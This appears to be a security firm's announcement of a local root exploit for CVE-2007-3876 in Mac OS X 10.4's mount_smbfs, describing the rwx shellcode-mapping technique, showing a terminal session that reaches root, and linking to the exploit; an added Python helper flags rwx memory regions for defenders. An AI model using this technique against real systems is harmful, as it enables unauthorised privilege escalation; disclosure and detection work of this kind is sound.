We are happy to announce the availability of a 100% reliable exploit against CVE-2007-3876, the mount_smbfs argument stack-based buffer overflow. Using the shared_region_map_file_np() system call, we map a file containing shellcode at a fixed location, with write, read and execute permissions (VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE). This technique was first documented publicly in a Phrack article by nemo, and has been partially restricted in Leopard.
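The technique rests on a mapping that is writable and executable at the same time, which is unusual for a legitimate process and is the kind of thing a defender can look for. The following is an added example, not code from this post or from Subreption: a small Python parser over the text output of the macOS `vmmap` tool that reports every region whose current protection is rwx and notes whether it falls in the shared-library region. The `vmmap` line layout assumed here, the shared-region bounds and the sample lines are all constructed for illustration; only the 0x9ffff000 mapping address comes from the exploit output quoted on this page.

```python
import re

# Added detection helper (not Subreption's code). It parses the text output of
# `vmmap <pid>` on macOS and reports regions mapped rwx, i.e. writable and
# executable at once, which is what shared_region_map_file_np() produces in the
# technique described above. The line layout assumed here (region type,
# start-end, [size], cur/max protection, ...) is an assumption about vmmap's
# output, not something taken from the post.
VMMAP_LINE = re.compile(
    r"^(?P<type>\S.*?)\s+"
    r"(?P<start>[0-9a-fA-F]+)-(?P<end>[0-9a-fA-F]+)\s+"
    r"\[\s*(?P<size>[^\]]+)\]\s+"
    r"(?P<cur>[rwx-]{3})/(?P<max>[rwx-]{3})"
)

# Assumed bounds of the Mac OS X 10.4 shared region, chosen so that the
# 0x9ffff000 mapping reported by the exploit falls inside it. These are an
# illustration only, not an authoritative memory map of the system.
SHARED_REGION = (0x90000000, 0xA0000000)


def parse_vmmap(text):
    """Turn vmmap text into a list of region dicts (lines that don't match are skipped)."""
    regions = []
    for line in text.splitlines():
        m = VMMAP_LINE.match(line.strip())
        if not m:
            continue
        regions.append({
            "type": m.group("type").strip(),
            "start": int(m.group("start"), 16),
            "end": int(m.group("end"), 16),
            "cur": m.group("cur"),
            "max": m.group("max"),
        })
    return regions


def find_rwx_regions(text):
    """Return (start, end, type, in_shared_region) for every region currently mapped rwx."""
    hits = []
    for r in parse_vmmap(text):
        if r["cur"] == "rwx":
            in_shared = SHARED_REGION[0] <= r["start"] < SHARED_REGION[1]
            hits.append((r["start"], r["end"], r["type"], in_shared))
    return hits


# Constructed sample vmmap output: four ordinary regions plus one rwx file
# mapping placed at the address the exploit reports on this page.
SAMPLE_VMMAP = """\
__TEXT                 00001000-00005000 [   16K] r-x/rwx SM=COW  /sbin/mount_smbfs
__DATA                 00005000-00006000 [    4K] rw-/rwx SM=COW  /sbin/mount_smbfs
MALLOC_TINY            00300000-00400000 [ 1024K] rw-/rwx SM=PRV  DefaultMallocZone_0x300000
mapped file            9ffff000-a0000000 [    4K] rwx/rwx SM=COW  /tmp/some_mapped_file
Stack                  bfc00000-c0000000 [ 4096K] rw-/rwx SM=ZER  thread 0
"""

if __name__ == "__main__":
    for start, end, rtype, in_shared in find_rwx_regions(SAMPLE_VMMAP):
        where = "inside" if in_shared else "outside"
        print(f"rwx region {start:08x}-{end:08x} ({rtype}) {where} the shared region")
```

Run against the constructed sample it reports exactly one region, the rwx mapping at 0x9ffff000, and flags it as lying in the shared region. In practice the check would be fed the real `vmmap` output of a running process; a 'mapped file' region that is both writable and executable is worth investigating regardless of where it lands.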
On an unpatched Mac OS X 10.4 installation (that is, one without the update that fixes this problem) it allows any local user to gain root privileges.
$ ./mount_smbfs_root
Mac OS X 10.4.10, 10.4.11 mount_smbfs Local Root exploit
Copyright (c) 2007-2008 Subreption LLC. All rights reserved.
Mapping shellcode from file via shared_region_map_file_np()...
Shellcode mapped: mapping starts at 0x9ffff000, shellcode at 9fffff71
Payload size: 1064 (1040 padding bytes), Return address: 0x9fffff71
mount_smbfs: workgroup name 'AAAA...'
malcomx:/Users/nonpriv root# id
uid=0(root) gid=501(nonpriv) groups=501(nonpriv), 81(appserveradm), 79(appserverusr), 80(admin)
malcomx:/Users/nonpriv root# exit
exit

It is available at our corporate public repository, as well as the Milw0rm website.
- Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit (At Subreption public repository)
- Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit (Mirror)
- The original Ruby proof of concept: mount_smbfs_root.rb